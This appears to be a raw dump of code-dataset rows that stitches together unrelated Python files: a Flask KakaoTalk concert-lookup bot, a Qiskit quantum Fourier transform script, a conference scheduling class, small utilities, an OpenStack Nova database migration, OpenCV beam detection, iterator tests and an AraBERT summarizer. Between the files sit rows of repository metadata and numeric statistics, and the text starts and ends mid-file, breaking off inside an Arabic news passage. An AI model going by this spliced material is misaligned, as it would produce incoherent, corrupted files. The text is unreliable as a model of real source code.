app.run(host='0.0.0.0', debug=True) | 29.829268 | 248 | 0.69583 | 0 | 0 | 0 | 0 | 866 | 0.708095 | 0 | 0 | 191 | 0.156173 |
446c2ae8c6bf8f99edbaa2c4f1abc4a583ee51c3 | 8,259 | py | Python | app.py | snoop2head/indigo | 9468491cfc18d39ff5994bb4ee2d0d891067867d | [
"MIT"
] | 1 | 2019-08-24T14:13:20.000Z | 2019-08-24T14:13:20.000Z | app.py | snoop2head/Open_Race_of_Development_Indie_Band | 9468491cfc18d39ff5994bb4ee2d0d891067867d | [
"MIT"
] | 2 | 2021-04-30T21:00:26.000Z | 2021-06-02T00:59:08.000Z | app.py | snoop2head/Open_Race_of_Development_Indie_Band | 9468491cfc18d39ff5994bb4ee2d0d891067867d | [
"MIT"
] | null | null | null | from flask import Flask, request, jsonify
from db_user_interactions import user_respond
from pymongo import MongoClient
from datetime import date, datetime, timedelta
import re
#today's date
today_int = date.today()
print("test_app - Today's date:", today_int)
today_str = str(today_int)
#mongodb setup
client = MongoClient('your_api_server_ip',27017)
db = client.ukov_dev
# app is Flask
app = Flask(__name__)
'''
data_list = db.archive.find({'artist_name':'새소년'})
for data in data_list:
print(data)
'''
@app.route('/', methods=['POST'])
def receive_message():
# data received from KakaoTalk
dataReceive = request.get_json()
print(dataReceive)
user_key = dataReceive["userRequest"]["user"]["id"]
print(user_key)
# json format is 'userRequest' -> 'utterance'
if dataReceive["userRequest"]["utterance"]:
# received name
# name = dataReceive["userRequest"]["utterance"]
# user request refining artist
# db.same_name.find_one('name')
# registered name
artist_name = dataReceive["action"]["params"]["가수"]
print("processing name is "+ artist_name)
# need to extract the text getting rid of \n and ]r
if re.search("(\\r|)\\n$", artist_name):
artist_name= re.sub("(\\r|)\\n$", "", artist_name)
data_list = db.archive.find({'artist_name':artist_name})
print("app.py - data list from archive is:" + str(data_list))
item_list =[]
# find all data from archive collection
# if there is ticket information on archive
# getting user key and registering on db
user_respond(artist_name, today_str, user_key)
for data in data_list:
duration = "기간: " + data['start_date'] + " ~ " + data['end_date']
item = \
{
"title":data['title'],
"description":duration,
"thumbnail":
{
"imageUrl":data['poster_png']},
"social": {"like":"","comment":"","share":""},
"buttons":
[{"action":"webLink","label":"예매하기",
"webLinkUrl":data['url']},
{"action":"share","label":"공유하기"}]
}
item_list.append(item)
if not item_list:
dataSend = {
"version": "2.0",
"template": {
"outputs": [
{
"simpleText": {
"text": "ㅠㅠ "+artist_name+"의 공연이 안 잡혔나봐요 ㅠㅠ"
}
}
]
}}
return jsonify(dataSend)
else:
# changed "Carousel" into "carousel"
dataSend = \
{"version":"2.0",
"template":
{"outputs":
[{"carousel":
{"type":"basicCard","items": item_list}}]}}
print(dataSend)
return jsonify(dataSend)
@app.route('/calendar', methods = ['POST'])
def receive_for_calendar():
# data received from KakaoTalk
dataReceive = request.get_json()
print(dataReceive)
user_key = dataReceive["userRequest"]["user"]["id"]
print(user_key)
# json format is 'userRequest' -> 'utterance'
if dataReceive["userRequest"]["utterance"]:
# received name
# name = dataReceive["userRequest"]["utterance"]
# user request refining artist
# db.same_name.find_one('name')
# registered name
artist_name = dataReceive["action"]["params"]["가수"]
print("processing name is "+ artist_name)
# need to extract the text getting rid of \n and ]r
if re.search("(\\r|)\\n$", artist_name):
artist_name= re.sub("(\\r|)\\n$", "", artist_name)
public_url_data = db.calendar.find_one({'artist_name':artist_name})
if not public_url_data:
dataSend = {
"version": "2.0",
"template": {
"outputs": [
{
"simpleText": {
"text": "ㅠㅠ "+artist_name+"의 공연이 안 잡혔나봐요 ㅠㅠ"
}
}
]
}}
return jsonify(dataSend)
else:
public_url = public_url_data['public_url']
print(public_url)
dataSend = \
{"version":"2.0",
"template":
{
"outputs":
[
{
"basicCard":
{
"title":"",
"description":"공연일정을 달력으로 보시겠습니까?",
"thumbnail":{},
"social":
{
"like":"",
"comment":"",
"share":"",
},
"buttons":
[
{"action":"webLink",
"label":"달력으로 보기",
"webLinkUrl":public_url,
}
],
},
}
],
},
}
print(dataSend)
return jsonify(dataSend)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=3000, debug=True)
'''
# sample from Kakao instruction
# https://i.kakao.com/docs/skill-response-format#bot
dataSend = {
"version": "2.0",
"template": {
"outputs": [
{
"carousel": {
"type": "basicCard",
"items": [
{
"title": "보물상자",
"description": "보물상자 안에는 뭐가 있을까",
"thumbnail": {
"imageUrl": "http://k.kakaocdn.net/dn/83BvP/bl20duRC1Q1/lj3JUcmrzC53YIjNDkqbWK/i_6piz1p.jpg"
},
"buttons": [
{
"action": "message",
"label": "열어보기",
"messageText": "짜잔! 우리가 찾던 보물입니다"
},
{
"action": "webLink",
"label": "구경하기",
"webLinkUrl": "https://e.kakao.com/t/hello-ryan"
}
]
},
{
"title": "보물상자2",
"description": "보물상자2 안에는 뭐가 있을까",
"thumbnail": {
"imageUrl": "http://k.kakaocdn.net/dn/83BvP/bl20duRC1Q1/lj3JUcmrzC53YIjNDkqbWK/i_6piz1p.jpg"
},
"buttons": [
{
"action": "message",
"label": "열어보기",
"messageText": "짜잔! 우리가 찾던 보물입니다"
},
{
"action": "webLink",
"label": "구경하기",
"webLinkUrl": "https://e.kakao.com/t/hello-ryan"
}
]
},
{
"title": "보물상자3",
"description": "보물상자3 안에는 뭐가 있을까",
"thumbnail": {
"imageUrl": "http://k.kakaocdn.net/dn/83BvP/bl20duRC1Q1/lj3JUcmrzC53YIjNDkqbWK/i_6piz1p.jpg"
},
"buttons": [
{
"action": "message",
"label": "열어보기",
"messageText": "짜잔! 우리가 찾던 보물입니다"
},
{
"action": "webLink",
"label": "구경하기",
"webLinkUrl": "https://e.kakao.com/t/hello-ryan"
}
]
}
]
}
}
]
}
}
'''
| 32.644269 | 116 | 0.403197 | 0 | 0 | 0 | 0 | 4,987 | 0.579412 | 0 | 0 | 4,985 | 0.57918 |
446f83409f2113d5e1b2ac5413dde30c7a47c64e | 3,270 | py | Python | sc_qiskitFilter.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | sc_qiskitFilter.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | sc_qiskitFilter.py | stroblme/hqsp-stqft | c2f8f8964648578755d3938bf8658e4c834548e8 | [
"MIT"
] | null | null | null | from qft import get_fft_from_counts, loadBackend, qft_framework
from fft import fft_framework
from frontend import frontend, signal, transform
from qiskit.circuit.library import QFT as qiskit_qft
# --- Standard imports
# Importing standard Qiskit libraries and configuring account
from qiskit import QuantumCircuit, execute, Aer, IBMQ
from qiskit.compiler import transpile, assemble
from qiskit.tools.jupyter import *
from qiskit.visualization import *
# Loading your IBM Q account(s)
provider = IBMQ.load_account()
# --- Imports
from qiskit import QuantumCircuit, execute, BasicAer
from qiskit.tools.monitor import job_monitor
import math
from numpy import linalg as LA
import numpy as np
#%config jupy = 'svg' # Makes the images look nice
# --- Computation of the calibration matrix
from qiskit.ignis.mitigation.measurement import (complete_meas_cal,CompleteMeasFitter)
from qiskit import *
nQubits = 4
nShots = 2048
qr = QuantumRegister(nQubits)
meas_calibs, state_labels = complete_meas_cal(qr=qr, circlabel='mcal')
_, backend = loadBackend('ibmq_quito', True)
job = execute(meas_calibs, backend=backend, shots=1000)
# job_monitor(job, interval = 3)
cal_results = job.result()
meas_fitter = CompleteMeasFitter(cal_results, state_labels, circlabel='mcal')
print(meas_fitter.cal_matrix)
q = QuantumRegister(4,'q')
qc = QuantumCircuit(q)
# Normalize ampl, which is required for squared sum of amps=1
ys = signal(samplingRate=1000, amplification=1, duration=0, nSamples=2**nQubits)
ys.addFrequency(125)
ys.addFrequency(250)
y = ys.sample()
plotData = ys.show(subplot=[1,4,1], title='signal')
print("Processing FFT")
fft = transform(fft_framework)
y_hat, f = fft.forward(ys)
y_hat_ideal_p, f_p = fft.postProcess(y_hat, f)
plotData = fft.show(y_hat_ideal_p, f_p, subplot=[1,4,2], title="FFT (ref)")
# y.addFrequency(250)
ampls = y / np.linalg.norm(y)
# for 2^n amplitudes, we have n qubits for initialization
# this means that the binary representation happens exactly here
qc.initialize(ampls, [q[i] for i in range(nQubits)])
qc += qiskit_qft(num_qubits=nQubits, approximation_degree=0, do_swaps=True, inverse=False, insert_barriers=False, name='qft')
qc.measure_all()
qc = transpile(qc, backend, optimization_level=1) # opt level 0,1..3. 3: heaviest opt
job = execute(qc, backend, shots = nShots)
#job = execute(qc, BasicAer.get_backend('qasm_simulator'), shots = shots)
result = job.result()
# print(result.get_counts())
genTransform = transform(None)
y_hat = np.array(get_fft_from_counts(result.get_counts(), nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,3], title=f"qft_sim_n")
print(y_hat)
# Get the filter object
meas_filter = meas_fitter.filter
# Results with mitigation
mitigated_results = meas_filter.apply(result)
mitigated_counts = mitigated_results.get_counts(0)
# print(mitigated_counts)
y_hat = np.array(get_fft_from_counts(mitigated_counts, nQubits))
f = genTransform.calcFreqArray(ys, y_hat)
y_hat_sim_p, f_p = genTransform.postProcess(y_hat, f)
plotData = genTransform.show(y_hat_sim_p, f_p, subplot=[1,4,4], title=f"qft_sim_n_f")
print(y_hat)
frontend.primeTime() | 23.357143 | 125 | 0.76422 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 757 | 0.231498 |
4471012b0e0606129edb11e34f8104b453eec981 | 2,551 | py | Python | resources/Presentation.py | radovankavicky/conference_scheduler | 6fbb38f95051199210796d345a8781c63aff959e | [
"Apache-2.0"
] | 3 | 2018-04-02T06:45:19.000Z | 2021-06-28T13:54:29.000Z | resources/Presentation.py | Suvink/conference_scheduler | 6fbb38f95051199210796d345a8781c63aff959e | [
"Apache-2.0"
] | null | null | null | resources/Presentation.py | Suvink/conference_scheduler | 6fbb38f95051199210796d345a8781c63aff959e | [
"Apache-2.0"
] | 1 | 2018-09-01T15:43:07.000Z | 2018-09-01T15:43:07.000Z | import json
import datetime as datetime
from typing import List, Set
# optional norlize talk types
types = {
'h_180': 'help desk',
'h': 'help desk', # 2015
'r_180': 'training',
't': 'training', # 2015
't_30': 'talk 30 Min',
't_45': 'talk 45 Min',
't_60': 'talk 60 Min',
's': 'talk 30+45 Min', # 2015
'i_60': 'interactive',
'p_180': 'poster',
'p': 'poster'}
talk_schedule_types = ['t_30', 't_45', 't_60',
'i_60',
'n_60', 'n_90',
'r_180']
class Presentation:
def __init__(self,
speaker_ids: List[int],
presentation_id: int,
title: str,
interest: int,
tags: Set[str],
category: Set[str],
duration: int,
frozen: bool=False,
track: str=None,
session_type: str=None,
admin_type: str=None,
level: str=None,
):
self.speaker_id = speaker_ids
self.presentation_id = presentation_id
self.title = title
self.interest = interest
self.tags = tags
self.category = category
self.track = track # pydata etc
self.duration = duration
self.frozen = frozen
self.session_type = session_type
self.admin_type = admin_type
self.level = level
self._starts_at = None
self._ends_at = None
self.idx = 0
def __gt__(self, other):
return self.title > other
def __lt__(self, other):
return self.title < other
def __eq__(self, other):
return self.title == other
def __iter__(self):
return self
def __next__(self):
if self.idx:
self.idx = 0
raise StopIteration
self.idx += 1
return self.presentation_id, self.title
def __repr__(self):
return "{}: {} [{}][{}]".format(self.presentation_id, self.title, self.duration, ', '.join(list(self.track)))
@property
def starts_at(self):
return self._starts_at
@property
def ends_at(self):
return self._ends_at
@starts_at.setter
def starts_at(self, starts_at: datetime.datetime):
if self.frozen:
raise AssertionError("This presentation is frozen, unfreeze to set a new start time")
self._starts_at = starts_at
self._ends_at = starts_at + datetime.timedelta(minutes=self.duration)
| 26.572917 | 117 | 0.540572 | 1,995 | 0.782046 | 0 | 0 | 434 | 0.170129 | 0 | 0 | 369 | 0.144649 |
447112b6fa86b5ec0c006f66a69b184bd85f3270 | 267 | py | Python | recursion/base_converter.py | Yasir323/Data-Structures-and-Algorithms-in-Python | b721d0ca0218b9665d4f6ca0bbfd4417244bcdf0 | [
"MIT"
] | null | null | null | recursion/base_converter.py | Yasir323/Data-Structures-and-Algorithms-in-Python | b721d0ca0218b9665d4f6ca0bbfd4417244bcdf0 | [
"MIT"
] | null | null | null | recursion/base_converter.py | Yasir323/Data-Structures-and-Algorithms-in-Python | b721d0ca0218b9665d4f6ca0bbfd4417244bcdf0 | [
"MIT"
] | null | null | null | def decimal2base(num, base):
convert_string = "0123456789ABCDEF"
if num < base:
return convert_string[num]
remainder = num % base
num = num // base
return decimal2base(num, base) + convert_string[remainder]
print(decimal2base(1453, 16))
| 24.272727 | 62 | 0.677903 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.067416 |
4473079529dd5e75b3a6bb336fc7b57ed2937e16 | 3,894 | py | Python | nova/db/sqlalchemy/migrate_repo/versions/115_make_user_quotas_key_and_value.py | dreamhost/nova | 066a3d4c410056689b5843d9520f43b2b6e7d127 | [
"Apache-2.0"
] | 1 | 2019-11-06T12:21:59.000Z | 2019-11-06T12:21:59.000Z | nova/db/sqlalchemy/migrate_repo/versions/115_make_user_quotas_key_and_value.py | dreamhost/nova | 066a3d4c410056689b5843d9520f43b2b6e7d127 | [
"Apache-2.0"
] | null | null | null | nova/db/sqlalchemy/migrate_repo/versions/115_make_user_quotas_key_and_value.py | dreamhost/nova | 066a3d4c410056689b5843d9520f43b2b6e7d127 | [
"Apache-2.0"
] | 2 | 2019-12-23T18:06:28.000Z | 2020-07-24T08:44:28.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.openstack.common import log as logging
from sqlalchemy import Boolean, Column, DateTime, Integer
from sqlalchemy import MetaData, String, Table
LOG = logging.getLogger(__name__)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine;
# bind migrate_engine to your metadata
meta = MetaData()
meta.bind = migrate_engine
# Add 'user_id' column to quota_usages table.
quota_usages = Table('quota_usages', meta, autoload=True)
user_id = Column('user_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False))
quota_usages.create_column(user_id)
# Add 'user_id' column to reservations table.
reservations = Table('reservations', meta, autoload=True)
user_id = Column('user_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False))
reservations.create_column(user_id)
# New table.
user_quotas = Table('user_quotas', meta,
Column('id', Integer(), primary_key=True),
Column('created_at', DateTime(timezone=False)),
Column('updated_at', DateTime(timezone=False)),
Column('deleted_at', DateTime(timezone=False)),
Column('deleted', Boolean(), default=False),
Column('user_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False)),
Column('project_id',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False)),
Column('resource',
String(length=255, convert_unicode=False,
assert_unicode=None, unicode_error=None,
_warn_on_bytestring=False),
nullable=False),
Column('hard_limit', Integer(), nullable=True),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
try:
user_quotas.create()
except Exception:
LOG.error(_("Table |%s| not created!"), repr(user_quotas))
raise
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = MetaData()
meta.bind = migrate_engine
quota_usages = Table('quota_usages', meta, autoload=True)
quota_usages.drop_column('user_id')
reservations = Table('reservations', meta, autoload=True)
reservations.drop_column('user_id')
user_quotas = Table('user_quotas', meta, autoload=True)
try:
user_quotas.drop()
except Exception:
LOG.error(_("user_quotas table not dropped"))
raise
| 40.989474 | 78 | 0.586543 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,165 | 0.299178 |
4473dea74ad824b410db2d46eaf6858a8677dd85 | 857 | py | Python | src/bin_print.py | wykys/MIKS-FSK | a28255a1a184fb0b9753fcb133ea12e1b75ae93d | [
"MIT"
] | null | null | null | src/bin_print.py | wykys/MIKS-FSK | a28255a1a184fb0b9753fcb133ea12e1b75ae93d | [
"MIT"
] | null | null | null | src/bin_print.py | wykys/MIKS-FSK | a28255a1a184fb0b9753fcb133ea12e1b75ae93d | [
"MIT"
] | null | null | null | # wykys 2019
def bin_print(byte_array: list, num_in_line: int = 8, space: str = ' | '):
def bin_to_str(byte_array: list) -> str:
return ''.join([
chr(c) if c > 32 and c < 127 else '.' for c in byte_array
])
tmp = ''
for i, byte in enumerate(byte_array):
tmp = ''.join([tmp, f'{byte:02X}'])
if (i+1) % num_in_line:
tmp = ''.join([tmp, ' '])
else:
tmp = ''.join([
tmp,
space,
bin_to_str(byte_array[i-num_in_line+1:i+1]),
'\n'
])
if (i+1) % num_in_line:
tmp = ''.join([
tmp,
' '*(3*(num_in_line - ((i+1) % num_in_line)) - 1),
space,
bin_to_str(byte_array[i - ((i+1) % num_in_line) + 1:]),
'\n'
])
print(tmp)
| 26.78125 | 74 | 0.424737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 59 | 0.068845 |
44753690a6f52033d694b5d7fcc31dbb08db5c3c | 1,527 | py | Python | mmrotate/models/detectors/oriented_rcnn.py | liuyanyi/mmrotate | d80310aa2c4a67c877c62432cddee246d2a4dbcd | [
"Apache-2.0"
] | 449 | 2022-02-18T08:26:58.000Z | 2022-03-31T11:58:32.000Z | mmrotate/models/detectors/oriented_rcnn.py | liuyanyi/mmrotate | d80310aa2c4a67c877c62432cddee246d2a4dbcd | [
"Apache-2.0"
] | 162 | 2022-02-18T09:54:46.000Z | 2022-03-31T15:40:46.000Z | mmrotate/models/detectors/oriented_rcnn.py | liuyanyi/mmrotate | d80310aa2c4a67c877c62432cddee246d2a4dbcd | [
"Apache-2.0"
] | 98 | 2022-02-18T08:28:48.000Z | 2022-03-31T08:52:11.000Z | # Copyright (c) OpenMMLab. All rights reserved.
import torch
from ..builder import ROTATED_DETECTORS
from .two_stage import RotatedTwoStageDetector
@ROTATED_DETECTORS.register_module()
class OrientedRCNN(RotatedTwoStageDetector):
"""Implementation of `Oriented R-CNN for Object Detection.`__
__ https://openaccess.thecvf.com/content/ICCV2021/papers/Xie_Oriented_R-CNN_for_Object_Detection_ICCV_2021_paper.pdf # noqa: E501, E261.
"""
def __init__(self,
backbone,
rpn_head,
roi_head,
train_cfg,
test_cfg,
neck=None,
pretrained=None,
init_cfg=None):
super(OrientedRCNN, self).__init__(
backbone=backbone,
neck=neck,
rpn_head=rpn_head,
roi_head=roi_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained,
init_cfg=init_cfg)
def forward_dummy(self, img):
"""Used for computing network flops.
See `mmrotate/tools/analysis_tools/get_flops.py`
"""
outs = ()
# backbone
x = self.extract_feat(img)
# rpn
if self.with_rpn:
rpn_outs = self.rpn_head(x)
outs = outs + (rpn_outs, )
proposals = torch.randn(1000, 6).to(img.device)
# roi_head
roi_outs = self.roi_head.forward_dummy(x, proposals)
outs = outs + (roi_outs, )
return outs
| 29.941176 | 141 | 0.585462 | 1,338 | 0.876228 | 0 | 0 | 1,375 | 0.900458 | 0 | 0 | 390 | 0.255403 |
44755cd5a2c76db41cda5c1690ebfe260273ba7d | 3,008 | py | Python | beam.py | alexzhou007/VIF | ce2a97eb0cb6f056c570adb2b32c69adb1ae3c22 | [
"MIT"
] | 3 | 2018-11-08T17:45:20.000Z | 2019-08-05T14:38:32.000Z | beam.py | alexzhou007/VIF | ce2a97eb0cb6f056c570adb2b32c69adb1ae3c22 | [
"MIT"
] | null | null | null | beam.py | alexzhou007/VIF | ce2a97eb0cb6f056c570adb2b32c69adb1ae3c22 | [
"MIT"
] | 1 | 2018-11-05T13:01:30.000Z | 2018-11-05T13:01:30.000Z | import numpy as np
import cv2
import wall
SAME_LINE_THRESHOLD = 100
SAME_LEVEL_THRESHOLD = 8
SHORT_LINE_LENGTH = 10
BLEED_THRESHOLD = 10
def similar_line_already_found(line, found_lines):
for fline in found_lines:
x1, y1, x2, y2 = line
fx1, fy1, fx2, fy2 = fline
is_vertical_with_range = abs(x1 - x2) < SAME_LEVEL_THRESHOLD
is_horizental_with_range = abs(y1 - y2) < SAME_LEVEL_THRESHOLD
# Drop if short line.
if ((is_horizental_with_range and abs(x1 - x2) < SHORT_LINE_LENGTH) or
(is_vertical_with_range and abs(y1 - y2) < SHORT_LINE_LENGTH)):
return True
xdiff = abs(x1 - fx1) + abs(x2 - fx2)
ydiff = abs(y1 - fy1) + abs(y2 - fy2)
diff = xdiff + ydiff
if diff <= SAME_LINE_THRESHOLD:
if is_horizental_with_range:
avg_y = int((y1 + y2 + fy1 + fy2) / 4)
fline[1] = fline[3] = avg_y
elif is_vertical_with_range:
avg_x = int((x1 + x2 + fx1 + fx2) / 4)
fline[0] = fline[2] = avg_x
return True
if is_horizental_with_range and (
(x1 > fx1 - BLEED_THRESHOLD and x2 < fx2 + BLEED_THRESHOLD) or
(x1 > fx2 - BLEED_THRESHOLD and x2 < fx1 + BLEED_THRESHOLD)
) and abs(ydiff < SAME_LINE_THRESHOLD/2):
avg_y = int((y1 + y2 + fy1 + fy2) / 4)
fline[1] = fline[3] = avg_y
return True
elif is_vertical_with_range and (
(y1 > fy1 - BLEED_THRESHOLD and y2 < fy2 + BLEED_THRESHOLD) or
(y1 > fy2 - BLEED_THRESHOLD and y2 < fy1 + BLEED_THRESHOLD)
) and abs(xdiff < SAME_LINE_THRESHOLD/2):
avg_x = int((x1 + x2 + fx1 + fx2) / 4)
fline[0] = fline[2] = avg_x
return True
return False
def normalize_lines(lines):
norm_dict = {}
normalized_lines = []
for line in lines:
existing_line = similar_line_already_found(line[0].tolist(), normalized_lines)
if not existing_line:
normalized_lines.append(line[0].tolist())
return normalized_lines
def find_steel_beams(img, debug=False):
image = wall.remove_walls(img)
if debug:
cv2.imshow("Walls/Columns Removed", image)
cv2.waitKey(0)
thresh = 50
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
im_bw = cv2.threshold(gray, thresh, 255, cv2.THRESH_BINARY)[1]
if debug:
cv2.imshow("Black And White", im_bw)
cv2.waitKey(0)
kernel = np.ones((2,2),np.uint8)
erosion = cv2.erode(im_bw, kernel, iterations=3)
if debug:
cv2.imshow("Erode", erosion)
cv2.waitKey(0)
dilation = cv2.dilate(erosion, kernel, iterations=3)
if debug:
cv2.imshow("Dilate", dilation)
cv2.waitKey(0)
minLineLength = 100
maxLineGap = 0
lines = cv2.HoughLinesP(dilation, rho=0.02, theta=np.pi/500, threshold=10, minLineLength=minLineLength, maxLineGap=maxLineGap)
print("Found %d lines" % len(lines))
lines = normalize_lines(lines)
print("Normalized to %d lines" % len(lines))
for line in lines:
x1, y1, x2, y2 = line
cv2.line(img,(x1,y1),(x2,y2),(0,255,0),2)
if debug:
cv2.imshow("Beam", img)
cv2.waitKey(0)
return lines | 30.383838 | 128 | 0.65758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 122 | 0.040559 |
4476220506d945bb783299ab9c689b2af1b83a67 | 1,363 | py | Python | tests/test_modifiers.py | mbillingr/friendly-iter | 77e1ce72100f592b6155a2152fcc03165af22714 | [
"MIT"
] | null | null | null | tests/test_modifiers.py | mbillingr/friendly-iter | 77e1ce72100f592b6155a2152fcc03165af22714 | [
"MIT"
] | null | null | null | tests/test_modifiers.py | mbillingr/friendly-iter | 77e1ce72100f592b6155a2152fcc03165af22714 | [
"MIT"
] | null | null | null | from unittest.mock import Mock
import pytest
from friendly_iter.iterator_modifiers import flatten, take, skip, step
def test_flatten():
result = flatten([range(4), [], [4, 5]])
assert list(result) == [0, 1, 2, 3, 4, 5]
def test_take_limits_number_of_resulting_items():
result = take(3, range(10))
assert list(result) == [0, 1, 2]
def test_take_works_if_iterator_is_too_short():
result = take(10, range(3))
assert list(result) == [0, 1, 2]
def test_skip_drops_first_n_elements():
result = skip(2, [1, 2, 3, 4, 5])
assert list(result) == [3, 4, 5]
def test_skipping_too_many_results_in_empty_iterator():
result = skip(3, [1, 2])
assert list(result) == []
def test_skip_advanced_iterator_lazily():
skip(3, FailingIter()) # should not raise
def test_refuse_stepsize_less_than_one():
with pytest.raises(ValueError):
step(0, [])
def test_step_size_one_is_an_identity_operation():
it = Mock()
result = step(1, it)
assert result is it
def test_step_always_yields_first_element():
result = step(2, [1])
assert list(result) == [1]
def test_step_yields_every_nth_item():
result = step(2, [1, 2, 3, 4])
assert list(result) == [1, 3]
class FailingIter:
def __iter__(self):
return self
def __next__(self):
pytest.fail("Iterator was advanced")
| 21.296875 | 70 | 0.663977 | 132 | 0.096845 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.030081 |
44762645211964973e9a09e8d66e0bf5a566fa40 | 189 | py | Python | mysite/documents/urls.py | JarvisDong/Project-CGD | e499e13f358629583faf2778d8ba55852cf4cecf | [
"MIT"
] | null | null | null | mysite/documents/urls.py | JarvisDong/Project-CGD | e499e13f358629583faf2778d8ba55852cf4cecf | [
"MIT"
] | null | null | null | mysite/documents/urls.py | JarvisDong/Project-CGD | e499e13f358629583faf2778d8ba55852cf4cecf | [
"MIT"
] | null | null | null | # URLconf: map the index view in view.py to a URL
from django.conf.urls import url
from . import views
from django.views.generic import TemplateView
app_name = 'documents'
urlpatterns = [] | 27 | 49 | 0.772487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.31746 |
44762b0d5bcbe4b280011acbe66456167cfb82a3 | 7,580 | py | Python | arabert_summarize_example.py | abdullah-abunada/bert-extractive-summarizer | 45e69deed3dcc00c4073cb07507889ff44f1ca72 | [
"MIT"
] | 2 | 2021-10-02T08:12:35.000Z | 2022-01-09T20:41:14.000Z | arabert_summarize_example.py | abdullah-abunada/bert-extractive-summarizer | 45e69deed3dcc00c4073cb07507889ff44f1ca72 | [
"MIT"
] | null | null | null | arabert_summarize_example.py | abdullah-abunada/bert-extractive-summarizer | 45e69deed3dcc00c4073cb07507889ff44f1ca72 | [
"MIT"
] | 1 | 2021-12-29T21:53:31.000Z | 2021-12-29T21:53:31.000Z | from summarizer import Summarizer
from transformers import AutoTokenizer, AutoModel
from rouge import Rouge
body='''
أعلن اليوم الخميس في ماليزيا عن دخول ملك البلاد في حجر صحي بعد إصابة 7 عاملين في القصر بفيروس كورونا، ليكون بذلك أحدث زعماء العالم التحاقا بقائمة القادة الذين تحوم حولهم شبهة الإصابة بهذا الفيروس.
وقال مشرف القصر الوطني في ماليزيا أحمد فاضل شمس الدين اليوم إن الملك السلطان عبد الله رعاية الدين المصطفى بالله شاه والملكة الحاجة عزيزة أمينة ميمونة الإسكندرية قد خضعا لفحص طبي واختبار تشخيصي للفيروس، حيث جاءت نتائج تحاليلهما سلبية.
وقال إن الملك والملكة يخضعان حاليا للحجر الصحي في القصر، ولن يقبلا أي زيارة أو مقابلة رسمية إلى أن تنتهي فترة الحجر الصحي التي بدأت أمس ومن المقرر أن تستمر لمدة 14 يوما.
ويوم أمس الأربعاء، أعلن مقر إقامة ولي العهد البريطاني الأمير تشارلز إصابة الأمير بفيروس كورونا.
وقال متحدث باسم مقر إقامة الأمير تشارلز ثبتت إصابة الأمير تشارلز بفيروس كورونا، لقد ظهرت عليه أعراض طفيفة لكن صحته جيدة، وكان يعمل من البيت طوال الأيام الماضية كالمعتاد.
ومساء الأحد الماضي، أعلن في ألمانيا عن الاشتباه في إصابة المستشارة الألمانية أنجيلا ميركل بفيروس، وخضوعها لحجر منزلي رغم أن نتائج الفحوص التي أجرتها كانت سلبية، ومع ذلك قررت الخضوع للحجر الصحي والبقاء في المنزل.
في دوائر السلطة وقصور الحكم وخلال الأسابيع الماضية ومع اتساع دائرة العدوى وعدد الإصابات بفيروس كورونا في عدة دول ومناطق عبر العالم، بدأ الفيروس تدريجيا يقترب من مراكز اتخاذ القرار، وربما يعرض حياة قادة ومسؤولين كبار للخطر.
وخضع الرئيس الأميركي دونالد ترامب لفحص تأكد بعده أنه غير مصاب، وذلك بعد لقائه بوفد برازيلي أحد أفراده مصاب بالفيروس.
ولاحقا، أعلنت السلطات البرازيلية أن الوزير الذي التقى ترامب مصاب بالفيروس، كما وضع الرئيس جايير بولسونارو تحت المراقبة الصحية للتأكد من عدم إصابته.
وذكرت وسائل إعلام برازيلية اليوم أن سكرتير الرئيس أيضا مصاب بكورونا ووضع في الحجر الصحي.
كما خضع مايك بنس نائب الرئيس الأميركي وزوجته للفحص بعد إصابة موظف في مكتبه بالفيروس.
وخلال الأسابيع الماضية أعلنت السلطات النرويجية أن الملك هارالد الخامس والملكة وكامل أعضاء الحكومة وضعوا في الحجر الصحي بسبب الفيروس.
وفي كندا، قرر رئيس الوزراء جاستن ترودو العمل من منزله بعدما تبين أن زوجته صوفي غريغوار مصابة بالوباء.
وفي فرنسا، أصيب وزير الثقافة فرانك ريستر بفيروس كورونا، كما أصيب أيضا 10 نواب على الأقل، في حين تقرر نقل اجتماعات مجلس الوزراء من القاعة التي تعقد فيها تقليديا إلى أخرى أكبر مساحة لضمان ترتيب المقاعد على مسافة متر على الأقل.
كما أعلنت وزارة الدفاع الأميركية في وقت سابق أن الوزير مارك إسبر ونائبه وضعا في الحجر الصحي بعد تأكيد إصابة عشرات من طاقم الوزارة بفيروس كورونا.
